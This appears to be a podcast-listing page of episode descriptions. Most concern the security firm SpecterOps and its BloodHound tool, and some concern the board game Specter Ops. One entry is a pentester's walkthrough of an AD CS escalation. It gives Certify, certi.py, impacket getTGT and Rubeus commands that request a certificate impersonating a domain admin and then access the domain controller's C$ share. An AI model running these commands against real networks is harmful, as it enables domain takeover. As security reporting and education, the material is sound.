In this Risky Bulletin sponsor interview Justin Kohler, Chief Product Officer at SpecterOps talks to Tom Uren about the impossible challenge of managing identity directory services securely. Organisations try to implement the principle of least privilege but have no idea if they have done a good job. Justin talks about approaches SpecterOps is developing to address this problem.
On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news with special guest Rob Joyce, a Former Special Assistant to the US President and Director of Cybersecurity for NSA. They talk through: A realistic bluetooth-proximity phishing attack against Passkeys A very patient ransomware actor encrypts an entire enterprise with a puny linux webcam processor The ESP32 backdoor that is neither a door nor at the back The X DDoS that Elon said was Ukraine is claimed by pro-Palestinian hacktivists Years later, LastPass hackers are still emptying crypto-wallets …and it turns out North Korea nailed {Safe}Wallet with a malicious docker image. Nice! Rob Joyce recently testified to the US House Select Committee on the Chinese Communist Party, and he explains why DOGE kicking probationary employees to the curb is “devastating” for the national security staff pipeline. This week's episode is sponsored by SpecterOps, makers of the Bloodhound identity attack path mapping tool. Chief Product Officer Justin Kohler and Principal Security Researcher Lee Chagolla-Christensen discuss their pragmatic approach to disabling NTLM authentication in Active Directory using Bloodhound's insight. This episode is also available on Youtube. 
Show notes CVE-2024-9956 - PassKey Account Takeover in All Mobile Browsers | Tobia Righi - Security Researcher Feds Link $150M Cyberheist to 2022 LastPass Hacks – Krebs on Security Camera off: Akira deploys ransomware via webcam Tarlogic detects a hidden feature in the mass-market ESP32 chip that could infect millions of IoT devices Alleged Co-Founder of Garantex Arrested in India – Krebs on Security 37K+ VMware ESXi instances vulnerable to critical zero-day | Cybersecurity Dive Apple patches 0-day exploited in “extremely sophisticated attack” - Ars Technica What Really Happened With the DDoS Attacks That Took Down X | WIRED Eleven11bot estimates revised downward as researchers point to Mirai variant | Cybersecurity Dive Previously unidentified botnet infects unpatched TP-Link Archer home routers | The Record from Recorded Future News Safe.eth on X: "Investigation Updates and Community Call to Action" / X How to verify Safe{Wallet} transactions on a hardware wallet | Safe{Wallet} Help Center and Support. US charges Chinese nationals in cyberattacks on Treasury, dissidents and more | The Record from Recorded Future News Former top NSA cyber official: Probationary firings ‘devastating' to cyber, national security | CyberScoop U.S. pauses intelligence sharing with Ukraine used to target Russian forces - The Washington Post
On this week's show, Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including: The SEC's cyber incident reporting isn't very exciting after all China Telecom on the way to being thrown out of the US The NSA/Cybercom might get two separate hats The Cl0p ransomware crew are back and taking responsibility for the Cleo hacks (Yet another) File upload bug in Struts makes Java admins weep And much, much more. This episode is sponsored by SpecterOps, who run a pretty top notch offsec/pentest team when they're not busy making the Bloodhound Enterprise identity attack path enumeration software. SpecterOps' Robby Winchester joins to talk about how pentest has changed, and how their customers get value from their testing. This episode is also available on Youtube. Show notes SEC cyber incident reporting rule generates 71 filings in 11 months | Cybersecurity Dive US senators, green groups call for accountability over hacking of Exxon critics | Reuters Biden Administration Takes First Step to Retaliate Against China Over Hack - The New York Times Unfinished business for Trump: Ending the Cyber Command and NSA 'dual hat' | The Record from Recorded Future News EU opens investigation into TikTok and the Romanian election – POLITICO Clop ransomware claims responsibility for Cleo data theft attacks CISA warns of ransomware gangs exploiting Cleo, CyberPanel bugs | The Record from Recorded Future News CVE-2024-55956 | AttackerKB Apache issues patches for critical Struts 2 RCE bug • The Register Japanese game and anime publisher reportedly pays $3 million ransom to Russia-linked hackers | The Record from Recorded Future News Israeli spyware firm Paragon acquired by US investment group, report says | Reuters How Cryptocurrency Turns to Cash in Russian Banks – Krebs on Security Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop Russia bans Viber, claiming app facilitates terrorism and drug trafficking | The Record from Recorded Future News
It's been a tough few months for many local IT departments. Last week, hackers posted a handful of files stolen from SeaTac airport on the dark web. A ransomware gang is attempting to sell a trove of stolen Port of Seattle data for 6 million dollars in Bitcoin – after the Port refused to pay up. The cyber-attack a little over a month ago snarled travel when it took down ticketing, baggage, and other SeaTac services. But that's just the highest profile ransomware case in the Seattle area in recent months. A few weeks ago, the Highline School District canceled classes because a cyberattack had wormed its way into the local system. There was also a crippling ransomware attack on Seattle Public Libraries back in May, which put their book checkout and online systems in limbo for months. For more on what's happening – and how organizations can protect themselves – Soundside caught up with Robby Winchester, the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company. Thank you to the supporters of KUOW, you help make this show possible! If you want to help out, go to kuow.org/donate/soundsidenotes Soundside is a production of KUOW in Seattle, a proud member of the NPR Network. Guests: Robby Winchester on the line. He's the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company. Related Links: Hackers demand $6 million for files stolen from Seattle airport operator in cyberattack | AP News Highline schools closing Monday because of cyberattack | The Seattle Times Why did ransomware hackers target Seattle Public Library? – GeekWire
In episode 101 of Cybersecurity Where You Are, Sean Atkinson is joined by Justin Kohler, Vice President of Products at SpecterOps, and Jonathan Parfait, Technical Account Manager at SpecterOps. Together, they discuss how the visualization of attack paths in Active Directory helps organizations to better contextualize risks to their enterprise security. Here are some highlights from our episode:
- 01:54. What Bloodhound is and how it assists organizations in assessing risks in their Active Directory environments
- 05:08. Why have organizations look at their Active Directory environments
- 11:15. Common vulnerabilities and misconfigurations identified by Bloodhound
- 21:21. How organizations can best use Bloodhound as part of their cyber defensive strategy
- 29:18. How Bloodhound is adapting to keep up with evolving Active Directory environments
Resources
- Bloodhound Community Edition
- Episode 62: Inside the 'Spidey Sense' of a Pentester
- What You Need to Know About Hybrid Cloud Environments
- Vulnerability Management Policy Template for CIS Control 7
- CIS Benchmarks List
If you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.
On this week's show, Patrick Gray and Adam Boileau discuss the week's security news including: Microsoft did a good thing! Soon all Azure admins will require MFA The three billion row National Public Data breach mess, courtesy Florida Man US govt confirms that it was Iran that hacked the Trump campaign Is TP-Link the next Huawei, or just not very good at computers? Major Chinese RFID card maker has hardcoded backdoors And much, much more. This week's episode is sponsored by Specter Ops, makers of Bloodhound Enterprise. VP of Products Justin Kohler joins to talk about how they've joined their on-prem AD and cloud Entra attack path graphs, so you can map out that juicy, real-world attack surface. Show notes Announcing mandatory multi-factor authentication for Azure sign-in | Microsoft Azure Blog phishing resistant mfa - Google Search Microsoft will require MFA for all Azure users NationalPublicData.com Hack Exposes a Nation's Data – Krebs on Security National Public Data Published Its Own Passwords – Krebs on Security Bloomberg Law How the government's proposed 'Trust Exchange' digital ID scheme would work - ABC News German Cyber Agency Wants Changes in Microsoft, CrowdStrike Products After Tech Outage - WSJ Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts — FBI Crypto firm says hacker locked all employees out of Google products for four days ZachXBT on X: "Seven hours ago a suspicious transfer was made from a potential victim for 4064 BTC ($238M)" / X Bitcoin News Today: $238 Million Bitcoin Heist Linked to Genesis Global Trading Routers from China-based TP-Link a national security threat, US lawmakers claim Hardware backdoors found in Chinese smart cards Unmasking Styx Stealer: How a Hacker's Slip Led to an Intelligence Treasure Trove - Check Point Research Hardware backdoors found in Chinese smart cards Man who hacked Hawaii state registry to forge his own death certificate sentenced to 81 months
Guest: Zack Allen, Senior Director of Detection & Research @ Datadog, creator of Detection Engineering Weekly Topics: What are the biggest challenges facing detection engineers today? What do you tell people who want to consume detections and not engineer them? What advice would you give to someone who is interested in becoming a detection engineer at her organization? So, what IS a detection engineer? Do you need software skills to be one? How much breadth and depth do you need? What should a SOC leader whose team totally lacks such skills do? You created Detection Engineering Weekly. What motivated you to start this publication, and what are your goals for it? What are the learnings so far? You work for a vendor, so how should customers think of vendor-made vs customer-made detections and their balance? What goes into a backlog for detections and how do you inform it? Resources: Video (LinkedIn, YouTube) Zacks's newsletter: https://detectionengineering.net EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil EP117 Can a Small Team Adopt an Engineering-Centric Approach to Cybersecurity? The SRE book “Detection Spectrum” blog “Delivering Security at Scale: From Artisanal to Industrial” blog (and this too) “Detection Engineering is Painful — and It Shouldn't Be (Part 1)” blog series “Detection as Code? No, Detection as COOKING!” blog “Practical Threat Detection Engineering: A hands-on guide to planning, developing, and validating detection capabilities” book SpecterOps blog
In this Risky Business News sponsored interview, Tom Uren talks to Justin Kohler, VP of the Bloodhound team at SpecterOps about ‘attack paths', the ways that malicious actors maneuver through Active Directory to elevate their privileges. They discuss how and why they arise and what you can do about them.
The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.
In Season 5, Episode 19 of the BSM podcast, host Steven Bowcut welcomes Jared Atkinson, the Chief Strategist at SpecterOps and the host of the "Detection Challenging Paradigms Podcast." The episode focuses on the dynamic and increasingly important topic of purple teaming within cybersecurity.
Key Points Discussed
- Evolution of Purple Teaming: Jared delves into the progression of purple teaming practices and their significance in the current threat landscape. He emphasizes how both defensive (blue team) and offensive (red team) strategies have melded to form a more comprehensive security approach.
- Testing Landscape and Vendor Claims: The conversation touches on how the testing landscape has evolved, particularly considering vendor claims about the capabilities of their security solutions. Jared scrutinizes these claims and suggests a more measured approach to evaluating their efficacy.
- Shortcomings in Purple Team Assessments: Jared enumerates the reasons why many purple team assessments don't reach their full potential. These shortcomings often stem from a lack of realistic testing scenarios or comprehensive coverage of possible attack vectors.
- Role of New Frameworks: The introduction of new frameworks like Atomic Testing is highlighted as a game-changer in the field. Jared talks about how these frameworks can improve the precision and effectiveness of security assessments.
- Building and Selecting Test Cases: The importance of building and selecting diverse and relevant test cases is discussed. Jared underlines the necessity for organizations to cover a wide range of attack techniques in their testing protocols.
- Evolution of Attack Techniques: Examples of how attack techniques have evolved over time are provided, offering listeners insights into the adaptive nature of cyber threats.
- Analyzing Malware Samples: Jared points to SpecterOps's 10-part blog series that offers a deep dive into the technical aspects of malware sample analysis, an essential skill for modern threat hunters.
- Future of Purple Teaming: Finally, Jared presents his perspective on the direction purple teaming should take in the future. He stresses the need for continual adaptation and the adoption of forward-thinking strategies to stay ahead of threat actors.
Conclusion
The episode is informative for cybersecurity professionals looking to understand the current state and the progression of purple teaming. Jared Atkinson's expertise provides listeners with a detailed examination of the challenges and considerations essential to advancing the effectiveness of cybersecurity defenses through collaborative and realistic testing. The discussion not only sheds light on current practices but also charts a course for the future of purple teaming, making it a must-listen for those engaged in or interested in the strategic aspects of cybersecurity.
On this show this week we're talking about Microsoft unbundling Microsoft Teams in response to Slack: Good or bad and how will it affect you? New features coming to Teams that are long awaited, plus Justin Kohler from SpecterOps joins us on the show to talk about his TEC conference session & give us a plethora of AD-related cybersecurity advice. Hey Practical 365 Podcast Listeners, we need your feedback! Tell us what you would like to hear about in our upcoming episodes by filling out this 1-minute survey. Want to stay up to date on all things Practical 365? Follow us on Twitter, Facebook, and Linkedin to stay up to date on all things Microsoft!
Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.
Guest: Justin Kohler, Vice President of Products at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/
On Twitter | https://twitter.com/JustinKohler10
Host: Phillip Wylie
On ITSPmagazine
Guest: Stephen Hinck, System Engineering Manager at SpecterOps [@SpecterOps]
On LinkedIn | https://www.linkedin.com/in/shinck/
On Twitter | https://twitter.com/StephenHinck
Host: Phillip Wylie
On ITSPmagazine
CyberFront Z's failed influence operation. Iranian operators target Albanian government networks. CISA issues two ICS security advisories. Andy Robbins of SpecterOps to discuss Attack Paths in Azure. Denis O'Shea of Mobile Mentor talking on the intersection of endpoint security and employee experience. CISA and ACSC issue a joint advisory on top malware strains. For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/11/150 Selected reading. Quarterly Adversarial Threat Report (Meta) Meta took down Russian troll farm that supported country's invasion of Ukraine (The Hill) Russia's Infamous Troll Farm Is Back -- and Sh*tting the Bed (Rolling Stone) Meta's threat report highlights clumsy attempt to manipulate Ukraine discourse (TechCrunch) Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations (Mandiant) CISA Alert AA22-216A – 2021 top malware strains. (The CyberWire) 2021 Top Malware Strains (CISA) Digi ConnectPort X2D (CISA) Cisco Releases Security Updates for RV Series Routers (CISA)
This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol! Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a Visit https://www.securityweekly.com/psw for all the latest episodes! Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly Show Notes: https://securityweekly.com/psw747
In Episode 9, Robby Winchester of SpecterOps stops by to talk on Jared's favorite topic - Detectionomics (trademark pending). This was our second in-person episode and was a blast to make, we hope you enjoy!
Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:
- Grab Certi
- Grab Certify
- Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them.
In my case, the results I got from Certify showed:
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:
sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS'
export KRB5CCNAME=myuser.cache
sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME
From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:
rubeus.exe purge
rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER
And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!
We love playing games in-person! But sometimes you want to scratch that board-gaming itch for a few minutes in the middle of the workweek. Or during a "break." Or, well, all the damn time. Playing asynchronously on Board Game Arena lets you do just that...a lot. Just don't tell our bosses. Our BGA play pals Emerson Matsuuchi (designer of the Century series, Specter Ops, Reef, and the upcoming Foundations of Rome) and Jess Yi (frequent Going Analog contributor) join Christina and Shoe to gab about Board Game Arena vs. Tabletop Simulator, which games work best on the platform, and whether we can learn how to play (and enjoy) an entire game online without ever reading the rules. Our topics this episode: Jess (contributor): Board Game Arena vs. Tabletop Simulator Christina (host): Which games are better on Board Game Arena, and which are worse? Emerson (guest): Our experiences playing "blind" on Board Game Arena
Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper
SpecterOps researchers Lee Christensen and Will Schroeder discuss their work, to be presented at Black Hat, on how AD “misconfiguration debt” lays out a dizzying array of attack paths such as the one in the PetitPotam exploit for which Microsoft rushed out a fix.
In this episode, Chris Hadnagy and Ryan MacDougall are joined by Jason Frank. Jason has an extensive background in helping both government and Fortune 100 organizations, and has served as a course instructor for the Black Hat security conference. Jason is now currently the COO at SpecterOps, where he is accountable for execution of the company. He oversees the Adversary Simulation and Detection delivery capabilities, where he helps clients to understand, detect, and respond to adversaries. May 17, 2021
00:00 – Intro Social-Engineer.com Social-Engineer.org InnocentLivesFoundation.org Human Hacking Book Vishing as a Service (VaaS) Phishing as a Service (PHaaS) HumanHackingBook.com Slack Channel @HumanHacker on Twitter CLUTCH
03:05 – Podcast Guest Jason Frank Intro
03:22 – Jason at BlackHat
03:30 - SpecterOps
04:34 – How Jason got to where he is
08:50 – Curiosity and motivation born from failing at a CTF
09:50 – Adversary Simulation – why is Jason using this phrase?
12:32 – Where are we in the current security culture?
16:11 – How to get attention of stakeholders, what concepts do you put in play?
18:03 – Reactive vs. Proactive
21:56 – How can corporations prepare for and mitigate attacks?
23:39 – What are the business repercussions of not letting machines talk to each other, and only the server?
25:45 – What are the more recent attacks you’ve seen coming up that people should be looking for?
28:14 – Knowledge bombs – terminology that people can look up to recognize “low hanging fruit” they may be missing – Bloodhound
30:00 – Cycles where certain things can be exploited such as ActiveDirectory
30:50 – What other things do companies need to be watching for
32:14 – PowerShell
33:44 – What are some action steps that corporations should start taking right now?
34:51 – Colleagues Jason respects most in the industry Andrew Morris founder of GreyNoise Dane Stuckey from Palantir Jason Hill from DHS CISA Bryan Beyer and Keith McCammon from Red Canary
36:50 – Jason's Book Recommendations Creativity Inc. Principles: Life and Work Get A Grip
38:31 – Wrap-Up @jasonjfrank on Twitter Jason J Frank on LinkedIn @joemontmania on Twitter (Ryan MacDougall) @HumanHacker on Twitter (Chris Hadnagy) @InnocentOrg on Twitter (Innocent Lives Foundation)
Today we talk about another video game IP that’s found its way into the table top world, an awesome hidden movement game, and we share our tips and tricks for being the best board game teacher you can be.
In today's episode we discuss Western-themed games, both those that missed the mark for us and those that bring forth the excitement that is the Wild, Wild West. Our in-depth game review this week is Paleo by Peter Rustemeyer and published by Hans im Glück. This co-operative game is discussed at length as we discuss mechanisms, theme, arc and everything else that makes this game unique. In this episode we discuss Imperial Settlers, Empyreal: Spells & Steam, 7 Wonders, Pax Pamir, John Company, Specter Ops, plus some Western-themed games. Our game giveaway is Offshore from Aporta Games. See our Instagram for official rules. As always, if you enjoy our content, please consider liking, subscribing, and/or sharing our podcast wherever you are listening to this. We can be found on multiple other social media platforms include Instagram and Facebook. (see links below) Instagram: https://www.instagram.com/boardgamegambit/ Facebook: https://www.facebook.com/boardgamegambit/ Intro Music: [Sitcom Rock Sting] by Alexander Nakarada (www.serpentsoundstudios.com) Licensed under Creative Commons BY Attribution 4.0 License https://creativecommons.org/licenses/by/4.0/ Outro Music: [Sitcom Rock Sting 2] by Alexander Nakarada (www.serpentsoundstudios.com) Licensed under Creative Commons BY Attribution 4.0 License https://creativecommons.org/licenses/by/4.0/
Dylan and Bill explore the unseen corners of the hidden movement game, Specter Ops.
Sometimes all it takes is a good designer (and the right game) to take what would otherwise be a mechanic we don't like, and utilize it in a way that feels right. We take a look at some mechanics that we usually don't love, and the games that turned us around on them. Before we see things in a new light, we talk about CloudAge, Mariposas, and Faiyum. 03:04 - CloudAge 12:37 - Mariposas 18:01 - Faiyum 28:27 - Games that rescued a mechanism 28:40 - Performative Clues 29:05 - Time's Up 31:29 - On a Scale of One to T-Rex 32:19 - Action Points 32:52 - Flash Point: Fire Rescue 34:00 - Blood Rage 37:18 - Hidden Movement 37:18 - Nuns on the Run 37:45 - Specter Ops 38:35 - Scotland Yard 42:16 - Card Drafting 42:25 - Agricola 42:46 - 7 Wonders 43:53 - Paper Tales 44:25 - Inis 47:22 - Player Elimination 47:22 - Werewolf 47:40 - Shadow Hunters 48:09 - Secret Hitler 49:15 - Blood on the Clocktower 50:50 - "The Dice Game" 52:00 - For the King (and Me) 52:41 - Ra: The Dice Game Join the discussion at: https://boardgamebarrage.com/discord Join our Facebook group at: https://boardgamebarrage.com/facebook Get a Board Game Barrage T-shirt at: https://boardgamebarrage.com/store
Emma, Gil, and Scott discuss the idea of complexity in a board game. We explore 6 types of complexity, and discuss their effects on the games we play and design. SHOW NOTES 0m51s: Pete Seeger was an American folk singer, known for songs like "If I Had a Hammer," "Turn, Turn, Turn," and "Where Have All the Flowers Gone?" 2m04s: Our list of complexities: Spatial complexity Arithmetical complexity Zone complexity Planning complexity Rules/mechanism complexity Component complexity 2m45s: Barenpark, New York Zoo 3m44s: The SAT is a standardized test in the United States that is a major factor in a college's admission of a prospective student. 4m16s: Number 9 4m32s: Bosk 5m31s: Photosynthesis 6m30s: Treasure Island, Escape from the Aliens in Outer Space, Specter Ops, Tigris & Euphrates 7m14s: Checking the rules, an Internal Conflict in Tigris & Euphrates happens when a Leader is moved to a Kingdom where there is already a Leader of the same color belonging to another player. 8m00s: Star Wars: X-Wing Miniatures Game. Check out Scott's Biography of a Board Game on the Flight Path family of games, including X-Wing and Wings of War. 8m25s: The Warhammer family of games is absolutely massive. The flagship game, Warhammer 40,000, is in its 9th edition. 10m18s: The Funkoverse Strategy Game. We chatted with Chris Rowlands, one of its designers, in Ludology 224: Putting the Fun in Funko. 11m01s: Heroclix, Heroscape 13m23s: Set 15m17s: Power Grid, Russian Railroads, and Gil's own The Networks 16m26s: The term "Goumbaud's Law" was coined by Jesse Schell in his book The Art of Game Design: A Book of Lenses. 21m12s: Sticheln (the pronunciation of which Gil has completely butchered) was recently re-released by Capstone Games as Stick 'Em. Smartphone Inc. 22m46s: Sushi Go, Disney: The Haunted Mansion – Call of the Spirits Game 25m38s: Search for Planet X, Zendo (Kory Heath's design diary for Zendo remains a fantastic look at how hard it is to design a seemingly simple game.) 
26m40s: Mastermind 28m12s: Here's a description of the XYZ Wing solve technique for Sudoku. 28m33s: https://www.youtube.com/watch?v=Bg21M2zwG9Q (explicit language warning) 28m59s: Hey, That's My Fish, graph theory, and the Traveling Salesman problem. 29m33s: Scott first proposed the 6 Zones of Play in Ludology 209 - The 6 Zones of Play. 32m28s: Formula D 33m27s: Seafall, the Betrayal family of games. 41m21s: Ra 43m53s: A Feast for Odin 44m22s: A Few Acres of Snow 46m45s: Nielsen Media Research is best known for its Nielsen TV ratings, that offer the TV industry in the United States metrics into the number of viewers a TV show enjoys. 48m06s: Advanced Squad Leader, The Campaign for North Africa 50m13s: We discussed the futility of 1:1 models with Volko Ruhnke in Ludology 178 - COIN Operated. Gil also brings up the "Map-territory relation" problem. 50m29s: Food Chain Magnate, Feudum, Cloudspire, Kanban 54m48s: Two designers who work in complex games: Vital Lacerda and Dávid Turczi. You can hear our chat with Dávid about complex games in Ludology 234 - Playing with Time. 55m34s: Brass: Lancashire 57m27s: Fresco 1h00m20s: Gil discussed his doomed auction mechanism most recently in Ludology 235 - Rise to the Challenge. 1h01m45s: Samurai, Steel Driver, For Sale. Here's Samurai's scoring system: If one player has the most figures of 2 or 3 of the types of figures, they win. If no one has won in the previous step, only players who have the most of a single type of figure can win. All other players are eliminated. The remaining players set aside the figures they have of which they have the most of a certain type. The player with the most remaining figures wins. In case of a tie, the tied players re-collect all their figures and count their total number of figures. Highest total wins, all remaining ties are shared. 1h02m30s: Nomic, Fluxx 1h09m23s: Descent: Journeys in the Dark 1h10m45s: Geoff and Gil discussed "tight coupling" in Ludology 172 - Odd Coupling. 
1h12m04s: Carcassonne (the type Gil was thinking of is Monk) 1h13m25s: The Betrayal family of games (again) 1h14m46s: GameTrayz 1h16m20s: Mike Selinker uttered this now-legendary quote in Ludology 189 - The Missing Selinker. 1h17m47s: Gil's announcements: BGG@Home, Weird Stories pregen settings, High Rise pre-orders opening soon, Rival Networks 1h20m02s: Battling Tops, and the legendary BGG Battling Tops tournament. 1h20m22s: Tabletopia 1h20m44s: Emma, Gil, and Scott recorded Ludology 215 - Table Topics live at BGG.CON 2019. 1h21m06s: Scott's announcements: Treats, Xeno Command, Comic Book Crisis, The Pitch Project. 1h24m06s: Emma's announcements: Game Maker's Guild panel, Dutch and Hungarian versions of Abandon All Artichokes. 1h25m26s: Our contact info: Emma (Twitter, Instagram, Web), Gil (Twitter, Facebook, Web), Scott (Twitter, Instagram, and Facebook)
Our latest episode kept having the audio cut in and out.... It was unusable. So you get our unreleased pilot instead! We recorded this a long time ago, so I have no idea what's in the episode... It's a surprise! It's really a win-win situation when you think about it... You win twice! p.s. Jake is not in this episode, so I guess you lose as well.
This week Steve shares his recent experience of playing Smartphone Inc and he had a blast discovering new technology and engaging in patent-wars in the economic simulation Eurogame. Jules dons his evil-Jules cloak and twirls his moustache as he reveals that he loves nothing more than crushing his opponents' Viking armies on Blood Rage. Mitch details his nail-biting finishes in the one-vs-many hidden movement game Specter Ops. A popular measure in the board gaming community is the complexity of a game, which is often described as 'heavy' or 'light'. But does 'heavy' mean difficult? In the Topic of the week, the team discuss the weight of games, their favourite heavy games, and how to overcome the perceived entry barrier. In our Board Game Bracket segment, we wrap up some previous match-ups: Spyfall vs It's A Wonderful World, Arkham Horror 3rd Ed vs Mysterium, and Arkham Horror LCG vs Inis. And then we unleash our latest battle - Fleet: The Dice Game vs Champions of Midgard. It's Steve vs Mitch in this battle of Viking clans defending a town against an onslaught of trolls, vs ... well, fishing. Yeah, so there's that. (Let's be honest, when even the recording equipment falls asleep during your pitch, you know you're in trouble, Mitch!) In our Swear and Oath segment, Jules fulfilled his oath by playing Lords of Scotland and raises the bar with The Estates. Mitch failed to play Circle the Wagons, but successfully managed to plug Vyper Hyper playmats about 5 times in the space of a minute. He then doubles down with the sci-fi epic Anachrony. And Steve found Arkham Horror: The LCG very Conor-ish (which could be a compliment or not), and vows to play Xia: Legends of a Drift System before the debt collectors come knocking on his door. Sizzling Games: Smartphone Inc (2:18), Blood Rage (14:33), Specter Ops (22:45) Topic of the Week: What is a Heavy Game? 
(32:54) Board Game Bracket (59:42) Swear An Oath (1:17:07) **BOARDGAMEBBQ.COM** Head on over to the Board Game BBQ website for links to previous episodes, more information on all of the games mentioned, and upcoming events. **JOIN OUR DISCORD!** The BGBBQ now has a Discord Channel. Want to join the community and chat with the team and other listeners about your favourite hobby? Like to get updates when our podcasts are released, and get exclusive content? Need a place you can chat with other players while you're playing your own online games, or looking for some like-minded gamers to play online with? Well, here's your invite: https://discord.gg/rzQxJyR **FACEBOOK COMMUNITY** Why not join The Board Game BBQ Community page on Facebook. It's a place where everyone can post about their games, write reviews, engage with the community, and support each other. Regardless of if you are a casual gamer, a designer, an artist, a content creator - everyone is welcome! **INSTAGRAM** Follow us on Instagram to be notified when a new episode drops, or when our Discord events are happening. And don't forget to use #oathfulfilled when you finally get a game off your shelf of shame. --- Join in the conversation on our Facebook or Instagram pages, or drop us a line at podcast@boardgamebbq.com If you enjoy the podcast please consider leaving a short review on your podcast app of choice. Your feedback will help us improve the podcast, and we might even read your review out on the show!
In our one hundred and twenty-ninth episode, Aaron is still all alone so he talks about some ways he’s been enjoying gaming from home and he reflects on our review of Specter Ops from 100 episodes ago. Then Aaron is joined by Brendan, Robb, and Scott as they review the legacy-style negotiation game King's Dilemma. This episode is sponsored by Board Game Bliss
Which games transport us to new places or worlds? What makes a good asynchronous digital game? And how does sheltering in place change how a designer goes about his business? Board game designer Emerson Matsuuchi (Century series, Metal Gear Solid, Specter Ops) joins us to discuss. Here's a full list of games discussed on the show: Intro Century Metal Gear Solid Foundations of Rome Christina's topic: What are your top board games that help you escape? Tokaido Namiji Tales of Arabian Nights Hive Mind King of Tokyo Mansions of Madness Robinson Crusoe: Adventures on the Cursed Island Dead of Winter Above & Below Near & Far Mice & Mystics Aftermath Forgotten Waters Suburbia Emerson's topic: How important is it for a game to have something innovative? The Mind Dead Man's Cabal In the Hall of the Mountain King The Castles of Burgundy Lost Cities Codenames Paladins of the West Kingdom Architects of the West Kingdom Nick's topic: Asynchronous digital games The Castles of Burgundy Lost Cities Carcassonne Patchwork Ticket to Ride Tokaido Ascension Shards of Infinity Lords of Waterdeep Kingsburg Shoe's topic: How does shelter-in-place impact game design work? Infiltrator Final thoughts Just One Rising Sun
Pick Up & Deliver 221: Locke & Key (Themestorm) - Brendan ponders what a game built on the comic book and/or show Locke & Key would be like.
